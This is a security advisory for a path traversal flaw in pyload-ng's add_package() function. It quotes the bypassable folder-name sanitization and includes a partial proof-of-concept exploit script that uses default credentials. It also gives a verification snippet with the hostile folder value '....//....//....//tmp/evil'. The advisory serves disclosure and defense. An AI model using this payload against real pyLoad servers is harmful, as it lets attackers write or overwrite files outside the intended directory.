Lack of data validation - Path Traversal In pyload-ng
Description
PyLoad Vulnerable to Path Traversal via Package Folder Name Insufficient sanitization of package folder names allows writing files outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.py
Function: add_package()
Description
Package folder names are sanitized using insufficient string replacement:
folder = ( folder.replace("http://", "") .replace("https://", "") .replace("../", "_") # Bypassable! .replace("..\\", "_") .replace(":", "") .replace("/", "_") .replace("\\", "_")...
The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.
Proof of Concept
Setup
pip install pyload-ng[all] pyload -d & # Default credentials: pyload / pyload
Exploit
#!/usr/bin/env python3 import requests BASE_URL = "http://localhost:8000" USERNAME = "pyload" PASSWORD = "pyload" session = requests.Session()...
Verification
Check where files would be written:
import os download_dir = "/home/user/Downloads" folder = "....//....//....//tmp/evil" # Simulate pyLoad's sanitization sanitized = folder.replace("../", "_").replace("/", "_") print(f"After pyLoad sanitization: {sanitized}")...
Impact
Authenticated users with ADD permission can:
Write files outside the download directory
Potentially overwrite system files (depending on permissions)
Clutter system directories with downloaded content
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 pypi | pyload-ng | 0.5.0b3.dev100 |
Aliases
References